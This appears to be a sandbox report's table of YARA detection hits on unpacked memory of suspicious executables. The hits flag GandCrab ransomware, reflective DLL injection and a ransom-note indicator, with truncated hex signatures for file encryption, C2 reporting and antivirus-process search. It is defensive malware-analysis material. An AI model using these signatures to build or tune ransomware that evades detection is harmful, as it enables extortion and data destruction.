32.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
0.3.wThN5MTIsw.exe.3170000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
0.3.wThN5MTIsw.exe.3170000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
0.3.wThN5MTIsw.exe.3170000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.wThN5MTIsw.exe.3170000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
0.3.wThN5MTIsw.exe.3170000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.wThN5MTIsw.exe.3170000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
24.3.ssapst.exe.3b60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
24.3.ssapst.exe.3b60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
24.3.ssapst.exe.3b60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
24.3.ssapst.exe.3b60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
24.3.ssapst.exe.3b60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.3.ssapst.exe.3b60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
26.3.ssapst.exe.3830000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
26.3.ssapst.exe.3830000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
26.3.ssapst.exe.3830000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.3.ssapst.exe.3830000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
26.3.ssapst.exe.3830000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.3.ssapst.exe.3830000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
24.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
24.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
24.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
24.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
24.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
30.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
30.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
34.3.ssapst.exe.32a0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.3.ssapst.exe.32a0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.3.ssapst.exe.32a0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.3.ssapst.exe.32a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.3.ssapst.exe.32a0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.3.ssapst.exe.32a0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
35.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
35.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
35.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
18.3.ssapst.exe.3230000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.3.ssapst.exe.3230000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.3.ssapst.exe.3230000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.3.ssapst.exe.3230000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.3.ssapst.exe.3230000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.3.ssapst.exe.3230000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.3.ssapst.exe.3300000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
15.3.ssapst.exe.3300000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
15.3.ssapst.exe.3300000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.3.ssapst.exe.3300000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
15.3.ssapst.exe.3300000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.3.ssapst.exe.3300000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
6.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
6.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
6.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
6.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
